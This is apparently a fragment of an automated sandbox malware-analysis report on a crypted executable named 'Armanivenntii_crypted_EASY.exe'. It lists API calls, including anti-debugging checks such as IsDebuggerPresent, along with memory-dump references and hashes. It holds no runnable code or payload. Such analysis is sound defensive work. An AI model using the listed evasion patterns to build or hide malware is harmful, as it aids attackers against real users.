                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37D01232600208ABEF902BE1E80CB993F3CFB0E222F010420F71E82000CB7944548B61
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: !l,v$!l,v$2Iu4$3%OE
                                                                                                                                                                                                                                            • API String ID: 0-3794875722
                                                                                                                                                                                                                                            • Opcode ID: d8b33f9ce38e29cb3ea4694bf6636af631a582b0216bc129cdfe1ddebbab8453
                                                                                                                                                                                                                                            • Instruction ID: 237d1e16ed5229446f913b08f6668511442f840d1ecd481b020bc21a1bd73605
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8b33f9ce38e29cb3ea4694bf6636af631a582b0216bc129cdfe1ddebbab8453
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87323436E44105DFCB04CFBCD5C07DD7BF2AB86310F12651AE861EBB68D229A94ACB51
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDDBDED
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDDBDF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDDBE04
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                            • Opcode ID: 78d2bab9148313b1f85da55499cd5066334642f63a46ad444aace20b87c209aa
                                                                                                                                                                                                                                            • Instruction ID: 469ee23880e87f511816d6dddb4f7264618fbfc3787b4ccc16b9ef8b50d4c4bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78d2bab9148313b1f85da55499cd5066334642f63a46ad444aace20b87c209aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A031F470D01218ABCB21DF64D888BDCBBB8FF08314F5041EAE51CA72A0E770AB858F55
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 0;l$KCn
                                                                                                                                                                                                                                            • API String ID: 0-2076589724
                                                                                                                                                                                                                                            • Opcode ID: 576492d95d343a25e9edf1df85e4c313b781518bf2a32bff4088d3978d012c7d
                                                                                                                                                                                                                                            • Instruction ID: d154b0da29fbafad796ce2888ca202e958a4568d2db38eab4b3708da964fdffe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576492d95d343a25e9edf1df85e4c313b781518bf2a32bff4088d3978d012c7d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80527B75F44604CFDB04CFACC994BDEBBF9AF4A314F20421AD925ABBA5C6259805CF42
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDE2860,?,?,00000008,?,?,6CDE2463,00000000), ref: 6CDE2A92
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                                            • Opcode ID: b9e53881e5b7bb124137e292b2bd3ce373f4f69faa8cd70d6fb785c4ff0c6031
                                                                                                                                                                                                                                            • Instruction ID: f038f87d4ca015305081a155a341ba4ac2d007c560b3379ac22409e9e9cdd281
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9e53881e5b7bb124137e292b2bd3ce373f4f69faa8cd70d6fb785c4ff0c6031
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEB1293161060ADFD715CF28C88AB657BE0FF49368F258658E9E9CF6A5C335D981CB40
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDD7ECF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                                            • Opcode ID: f381a6bfbec0235af867b34dccee60bfc9e8272bc4bd0084b71776fdc84a5025
                                                                                                                                                                                                                                            • Instruction ID: 5a165c43a519ee84e0e44fb2fcfd0160ab914903d12351db98d6a39a1835e116
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f381a6bfbec0235af867b34dccee60bfc9e8272bc4bd0084b71776fdc84a5025
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751BDB1F01205DFEB15DF65C8817AABBF0FB48344F26866AD415EBA94D378E940CB90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6CDD9939
                                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 6CDD9A47
                                                                                                                                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 6CDD9A98
                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 6CDD9B99
                                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6CDD9BB4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                            • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                            • Opcode ID: 6e3e57235f8a7c3f965c8d93656a39b8dd3bdb0ec5a534f846088f37aa99d1aa
                                                                                                                                                                                                                                            • Instruction ID: b96cc9fcb1efe83d8185161d3957d18f97992b8c8ba0437e250eeef9f9132feb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3e57235f8a7c3f965c8d93656a39b8dd3bdb0ec5a534f846088f37aa99d1aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCB18D71C00209EFCF15CFA5C89099EB7B5FF04318B17519AE8156BA21DB32FA55CBA1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD8807
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDD880F
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD8898
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDD88C3
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD8918
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                            • Opcode ID: c0495546c3508288048342518a874a4958e2c304e332c4565e4c68a4a4b49d40
                                                                                                                                                                                                                                            • Instruction ID: 8e7644aea8214761d5ad71e99d294b4e590a4ad6b693ab1fac8a8ffe7d990647
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0495546c3508288048342518a874a4958e2c304e332c4565e4c68a4a4b49d40
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC41B034E01208EFCF02DF68CC80A9EBBB5AF45318F159156E9159BBA1D731EA45CBE1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,380F9D98,?,6CDDD807,6CDD7358,?,00000000,?,?,?), ref: 6CDDD7B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                            • Opcode ID: dbb8a19159b459d13b173fa2a91bb8bb1433578fb1226fc4b236a0c4d70d9e70
                                                                                                                                                                                                                                            • Instruction ID: 0308ef07ee17e7729a3840f5be617cc90deea9dc3cbeb14d64f5391054d79b02
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbb8a19159b459d13b173fa2a91bb8bb1433578fb1226fc4b236a0c4d70d9e70
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F21D875F05111F7DF21AB658C40E4A377D9B46768B260664EA16A7690EB70F900CBF0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,6CDD8E63,6CDD8BBE), ref: 6CDD8E7A
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDD8E88
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDD8EA1
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,6CDD8E63,6CDD8BBE), ref: 6CDD8EF3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: 39b28294b37de194bc730a48e9cb6072085db9552197a7b8a635cc4f3afc6185
                                                                                                                                                                                                                                            • Instruction ID: 9cef35a801164697cf646b0155bde3bf00a83eda32f304d5e3221492f6a84296
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39b28294b37de194bc730a48e9cb6072085db9552197a7b8a635cc4f3afc6185
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3901D272B0D212AAAA5217B5EC8564B37B8DB027BC732033AE5154ADF0EF53E80847D4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe, xrefs: 6CDDC948
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                                                            • API String ID: 0-1209501751
                                                                                                                                                                                                                                            • Opcode ID: 7f79b7842bde07a048cca5919323fe0bda8785d246ae78a2e3f81916839b0130
                                                                                                                                                                                                                                            • Instruction ID: 25288b1ea427d34688417688277d00d66467607771439f6e930810fb4e4a5e36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f79b7842bde07a048cca5919323fe0bda8785d246ae78a2e3f81916839b0130
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A921C571A09105FF9B10AFB6C84089A77ADEF8536EB064614F956D7A70D731FD008BA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,380F9D98,00000000,?,00000000,6CDE3112,000000FF,?,6CDDA895,?,?,6CDDA869,?), ref: 6CDDA930
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDDA942
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,6CDE3112,000000FF,?,6CDDA895,?,?,6CDDA869,?), ref: 6CDDA964
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: e51b5d7d4185cf5de25458d7a61faaf7fcf31f096130f17b0c5b4e85092d7bd2
                                                                                                                                                                                                                                            • Instruction ID: 33b0e12bf1e4fc63cba42b3d305ad87f3c71d553d8b9d5285ac555807e773f42
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e51b5d7d4185cf5de25458d7a61faaf7fcf31f096130f17b0c5b4e85092d7bd2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2018B71A00515EFEF019F90CC05FBE77BDFB09755F014525F916A26A0DB749504CB50
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 6CDD9BE4
                                                                                                                                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 6CDD9CCA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CatchEncodePointer
                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                            • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                            • Opcode ID: 8800dc1a1fa64c9de0b2386556c5a3ec4ae4ce5d9acd2dacaf89e8734ddc0567
                                                                                                                                                                                                                                            • Instruction ID: 87acc2bd5a736361eab4545abfebb8fab633f1b12345a49f45b1137e814451c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8800dc1a1fa64c9de0b2386556c5a3ec4ae4ce5d9acd2dacaf89e8734ddc0567
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52415871D00209EFCF06CF98DD90AEE7BB5FF08308F168199F915A6620D736A951DB91
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CDD93F3,00000000,?,6CE2D710,?,?,?,6CDD9596,00000004,InitializeCriticalSectionEx,6CDE5450,InitializeCriticalSectionEx), ref: 6CDD944F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,6CDD93F3,00000000,?,6CE2D710,?,?,?,6CDD9596,00000004,InitializeCriticalSectionEx,6CDE5450,InitializeCriticalSectionEx,00000000,?,6CDD8F62), ref: 6CDD9459
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CDD9481
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                            • Opcode ID: 971c039773d6693004400652e03660670cf9365c55c9613529593fe1998334a3
                                                                                                                                                                                                                                            • Instruction ID: 2a1ff66fafeec6c22c9d6cc381f7d7f76415886f92a9438c5b6096d22d6f6021
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 971c039773d6693004400652e03660670cf9365c55c9613529593fe1998334a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1E04830744204F7FF901BE1DC05B583E79AB45749F118034FA0CE84E1DF62E4108799
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
